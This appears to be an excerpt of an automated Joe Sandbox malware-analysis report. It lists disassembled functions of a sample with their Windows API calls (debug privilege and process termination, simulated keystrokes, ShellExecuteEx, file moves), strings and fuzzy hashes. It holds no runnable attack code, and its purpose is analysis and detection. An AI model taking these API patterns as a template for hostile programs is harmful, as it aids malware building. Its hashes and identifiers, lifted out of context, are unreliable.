                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                              • String ID: SeDebugPrivilege
                              • API String ID: 2533919879-2896544425
                              • Opcode ID: 02176194a601eb0821fe74333e1fca265b0c2d2edca2cb71549785318f2d1961
                              • Instruction ID: b42b4b09e8a46844c7e6ff439df55b65ae39def953f5a2b1c550fafb21fa66e9
                              • Opcode Fuzzy Hash: 02176194a601eb0821fe74333e1fca265b0c2d2edca2cb71549785318f2d1961
                              • Instruction Fuzzy Hash: E9418A712042159FDB24EF28C8A5F7DB7A1FF80714F088059FA82DB2D2DB75A904CB92
                              Function 008E3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                              Download Yara Rule
                              APIs
                              • LoadIconW.USER32(00000000,00007F03), ref: 008E32C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: IconLoad
                              • String ID: blank$info$question$stop$warning
                              • API String ID: 2457776203-404129466
                              • Opcode ID: ef0d3efbdb96aa155d6898e7498e8433aa18235857ecd7374851025a9f50410e
                              • Instruction ID: 456522e57599aadf6aee3bfecc7f8c9937915b31f1cc567a268e8b4c5655bd40
                              • Opcode Fuzzy Hash: ef0d3efbdb96aa155d6898e7498e8433aa18235857ecd7374851025a9f50410e
                              • Instruction Fuzzy Hash: A011EB3160C3C67AE7015A56DC46D6BB39CFF1B375F10002AFA44D7181D6659F4049A6
                              Function 008E4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008E454E
                              • LoadStringW.USER32(00000000), ref: 008E4555
                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008E456B
                              • LoadStringW.USER32(00000000), ref: 008E4572
                              • _wprintf.LIBCMT ref: 008E4598
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008E45B6
                              Strings
                              • %s (%d) : ==> %s: %s %s, xrefs: 008E4593
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString$Message_wprintf
                              • String ID: %s (%d) : ==> %s: %s %s
                              • API String ID: 3648134473-3128320259
                              • Opcode ID: 0eedb7a6efe10e21f75454f0c2458e56283114994af92aab0091103df7da31c0
                              • Instruction ID: f8317b5a5dbc6ada890f1f2c1133576defc400ac50be8ebc3ef4da23d2959546
                              • Opcode Fuzzy Hash: 0eedb7a6efe10e21f75454f0c2458e56283114994af92aab0091103df7da31c0
                              • Instruction Fuzzy Hash: 8C014FF290420CBFE760EBA49D89EE7776CE708301F0005A5BB49D2451EA759F859B71
                              Function 0090D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                              • GetSystemMetrics.USER32(0000000F), ref: 0090D78A
                              • GetSystemMetrics.USER32(0000000F), ref: 0090D7AA
                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0090D9E5
                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0090DA03
                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0090DA24
                              • ShowWindow.USER32(00000003,00000000), ref: 0090DA43
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0090DA68
                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 0090DA8B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                              • String ID:
                              • API String ID: 1211466189-0
                              • Opcode ID: c870019440143b6f83ac5fa8099fd26ecfa29b688069fc2a1d6a944fe2f0f2a1
                              • Instruction ID: 2dacf28dacbd89d48c97aa66b1a203fbf307424370e562bdf57a414584d95f78
                              • Opcode Fuzzy Hash: c870019440143b6f83ac5fa8099fd26ecfa29b688069fc2a1d6a944fe2f0f2a1
                              • Instruction Fuzzy Hash: EEB19A75601229EFDF14CFA8C9857BE7BB5FF44701F088069EC589B295D734AA90CB90
                              Function 00882A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                              Download Yara Rule
                              APIs
                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008BC417,00000004,00000000,00000000,00000000), ref: 00882ACF
                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,008BC417,00000004,00000000,00000000,00000000,000000FF), ref: 00882B17
                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,008BC417,00000004,00000000,00000000,00000000), ref: 008BC46A
                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,008BC417,00000004,00000000,00000000,00000000), ref: 008BC4D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ShowWindow
                              • String ID:
                              • API String ID: 1268545403-0
                              • Opcode ID: 609c9413543081e5ee08916025e2a32f13980e094b8e5770e075879c1fa073b5
                              • Instruction ID: 09d939f7b7c486880674222e363c9df78e23778219046dcabf74f1e949edbd08
                              • Opcode Fuzzy Hash: 609c9413543081e5ee08916025e2a32f13980e094b8e5770e075879c1fa073b5
                              • Instruction Fuzzy Hash: B9414774218694AEC73DAB2CCC9CBBF7B92FF86314F18881DE057C6660C635A941D711
                              Function 008E7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                              Download Yara Rule
                              APIs
                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 008E737F
                                • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008E73B6
                              • EnterCriticalSection.KERNEL32(?), ref: 008E73D2
                              • _memmove.LIBCMT ref: 008E7420
                              • _memmove.LIBCMT ref: 008E743D
                              • LeaveCriticalSection.KERNEL32(?), ref: 008E744C
                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008E7461
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E7480
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                              • String ID:
                              • API String ID: 256516436-0
                              • Opcode ID: 988d8a9454a764983390ac91c8df79e274f6ab0be1e8514c1ba22178c742343b
                              • Instruction ID: 9b33ca9e90b86da2dca5429b30fd32dcaab73e18acaa633d3e1fa26bdc3bd638
                              • Opcode Fuzzy Hash: 988d8a9454a764983390ac91c8df79e274f6ab0be1e8514c1ba22178c742343b
                              • Instruction Fuzzy Hash: A9319E35908205EFDF10EF69DC85AAE7BB8FF45710F1440A5F904EB286DB709A10DBA1
                              Function 00906442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                              Download Yara Rule
                              APIs
                              • DeleteObject.GDI32(00000000), ref: 0090645A
                              • GetDC.USER32(00000000), ref: 00906462
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0090646D
                              • ReleaseDC.USER32(00000000,00000000), ref: 00906479
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009064B5
                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009064C6
                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00909299,?,?,000000FF,00000000,?,000000FF,?), ref: 00906500
                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00906520
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                              • String ID:
                              • API String ID: 3864802216-0
                              • Opcode ID: 15ea53a85a3be54a4a7b44a7b8d61d5a435a04d21e44c8c3008c64f66430e6bc
                              • Instruction ID: 6e659f3285ebf0d82216aa053d38e5e15433843f4a85c91547ff7eedc4a7084e
                              • Opcode Fuzzy Hash: 15ea53a85a3be54a4a7b44a7b8d61d5a435a04d21e44c8c3008c64f66430e6bc
                              • Instruction Fuzzy Hash: 6A318D72214214BFEF208F10CC4AFEA3FADEF0A765F044065FE089A191C7759951CB60
                              Function 008DC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memcmp
                              • String ID:
                              • API String ID: 2931989736-0
                              • Opcode ID: e6f5592e65a6500b1fbf310a70ec024746f8f8c28d9d2f65e428a0db94a2c62d
                              • Instruction ID: 9929096bfbd8d22e19f4b3fbeca64e77befc67e5255d4ca2028cede652ffd511
                              • Opcode Fuzzy Hash: e6f5592e65a6500b1fbf310a70ec024746f8f8c28d9d2f65e428a0db94a2c62d
                              • Instruction Fuzzy Hash: 6721077174061BB7EA10B6249D46FAB339CFF61398F080122FE05D6782EB11DD21C2E6
                              Function 008EED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                              • _wcstok.LIBCMT ref: 008EEEFF
                              • _wcscpy.LIBCMT ref: 008EEF8E
                              • _memset.LIBCMT ref: 008EEFC1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                              • String ID: X
                              • API String ID: 774024439-3081909835
                              • Opcode ID: 08228814147aaf3d56637c7a411b36a424bbfe681d63e4630ff467d07137692c
                              • Instruction ID: d2dad40cf607b7775adbe63807318475bbd9c6ce636a99110615d909349183f1
                              • Opcode Fuzzy Hash: 08228814147aaf3d56637c7a411b36a424bbfe681d63e4630ff467d07137692c
                              • Instruction Fuzzy Hash: 63C137315087409FD724EF28C881A6AB7E4FF85314F14496DF999DB2A2DB70ED45CB82
                              Function 00881424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8efd0b2531ac7e32160b8d979c5f3fcf41fb807617801d7a7fdd69bafbdb4c11
                              • Instruction ID: 16bf42286dad2bdf9c0d66e4b240cbd7d44965dfb6168a2601e0519f009de0e8
                              • Opcode Fuzzy Hash: 8efd0b2531ac7e32160b8d979c5f3fcf41fb807617801d7a7fdd69bafbdb4c11
                              • Instruction Fuzzy Hash: 69717A30904109EFCF14EF98CC89ABEBB79FF85314F148159F915EA251DB34AA52CBA4
                              Function 008F6E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e6a2f49b75b4995c3c8541f4c83bd8f255cde30738fef047655c53efce2a0d5e
                              • Instruction ID: 7492afa910da044d874936e59c16e03916feb4d6f1c63004dcaa78ee5eba4168
                              • Opcode Fuzzy Hash: e6a2f49b75b4995c3c8541f4c83bd8f255cde30738fef047655c53efce2a0d5e
                              • Instruction Fuzzy Hash: 9661AC72108704ABD710EB28CC85E6BB7E9FF84714F544A19F646D7292DB70AD04CB92
                              Function 0090B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                              Download Yara Rule
                              APIs
                              • IsWindow.USER32(01165BC0), ref: 0090B6A5
                              • IsWindowEnabled.USER32(01165BC0), ref: 0090B6B1
                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0090B795
                              • SendMessageW.USER32(01165BC0,000000B0,?,?), ref: 0090B7CC
                              • IsDlgButtonChecked.USER32(?,?), ref: 0090B809
                              • GetWindowLongW.USER32(01165BC0,000000EC), ref: 0090B82B
                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0090B843
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                              • String ID:
                              • API String ID: 4072528602-0
                              • Opcode ID: 8d95afd3983e4ee0ba9a46d41a775c2b94ebbd089a68db2dac3e660fcdf7a91f
                              • Instruction ID: c0877fd123610631f38fa2c5aec147bf9ae9aff9ea9796bff97f9c89c3c6d43d
                              • Opcode Fuzzy Hash: 8d95afd3983e4ee0ba9a46d41a775c2b94ebbd089a68db2dac3e660fcdf7a91f
                              • Instruction Fuzzy Hash: CE719A75604304AFDB209F64C8A4FAABBFDFF8A310F144469E946973E1C732A981DB51
                              Function 008FF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008FF75C
                              • _memset.LIBCMT ref: 008FF825
                              • ShellExecuteExW.SHELL32(?), ref: 008FF86A
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                              • GetProcessId.KERNEL32(00000000), ref: 008FF8E1
                              • CloseHandle.KERNEL32(00000000), ref: 008FF910
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                              • String ID: @
                              • API String ID: 3522835683-2766056989
                              • Opcode ID: 303ef85fbec9806270c1dcf155883ff5dcea9fcb43f4add04630470fdb42fc23
                              • Instruction ID: 2f41508400bfdd31c317bb17234e144bbe49acbf62fcacc51171e7a22db83769
                              • Opcode Fuzzy Hash: 303ef85fbec9806270c1dcf155883ff5dcea9fcb43f4add04630470fdb42fc23
                              • Instruction Fuzzy Hash: FE618D75A00619DFCF14EF68C9849AEBBF5FF48310B148469E956EB352CB30AD41CB91
                              Function 008E145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32(?), ref: 008E149C
                              • GetKeyboardState.USER32(?), ref: 008E14B1
                              • SetKeyboardState.USER32(?), ref: 008E1512
                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 008E1540
                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 008E155F
                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 008E15A5
                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008E15C8
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                              • Instruction ID: cfed01f45b64007e617a8503e344aa8ae53ab6b57aa6770c412ef0fc7318cf0b
                              • Opcode Fuzzy Hash: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                              • Instruction Fuzzy Hash: F451E2B06087D53EFF32422A8C49BBABEAABB47304F084489E1D6C58D2C7A4DC84D751
                              Function 008E1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                              Download Yara Rule
                              APIs
                              • GetParent.USER32(00000000), ref: 008E12B5
                              • GetKeyboardState.USER32(?), ref: 008E12CA
                              • SetKeyboardState.USER32(?), ref: 008E132B
                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008E1357
                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008E1374
                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008E13B8
                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008E13D9
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              • Opcode ID: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                              • Instruction ID: 28b320c564a4ed642ae5dda84621dd1ef513401b6c04f2f6a7e13b7fe46de27f
                              • Opcode Fuzzy Hash: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                              • Instruction Fuzzy Hash: 1051E4B05086D53DFF3282268C59BBA7EA9FB07304F084589E1D4C6DC2D7A9EC84D751
                              Function 008E589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _wcsncpy$LocalTime
                              • String ID:
                              • API String ID: 2945705084-0
                              • Opcode ID: d575a9911f39b6eeec5fe63e3b797376eb9fbf131fcb7fd11a57a586b858b943
                              • Instruction ID: 5c8281eb5dff063bd809272249b42fa031c4057b01f818ea7eb533ee5628f9cb
                              • Opcode Fuzzy Hash: d575a9911f39b6eeec5fe63e3b797376eb9fbf131fcb7fd11a57a586b858b943
                              • Instruction Fuzzy Hash: 1F41B4A5C2012876DB10FBB988869CF77A8FF06710F509462F918E3522F634D755C7A6
                              Function 008E38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E38D3,?), ref: 008E48C7
                                • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E38D3,?), ref: 008E48E0
                              • lstrcmpiW.KERNEL32(?,?), ref: 008E38F3
                              • _wcscmp.LIBCMT ref: 008E390F
                              • MoveFileW.KERNEL32(?,?), ref: 008E3927
                              • _wcscat.LIBCMT ref: 008E396F
                              • SHFileOperationW.SHELL32(?), ref: 008E39DB
                              Strings
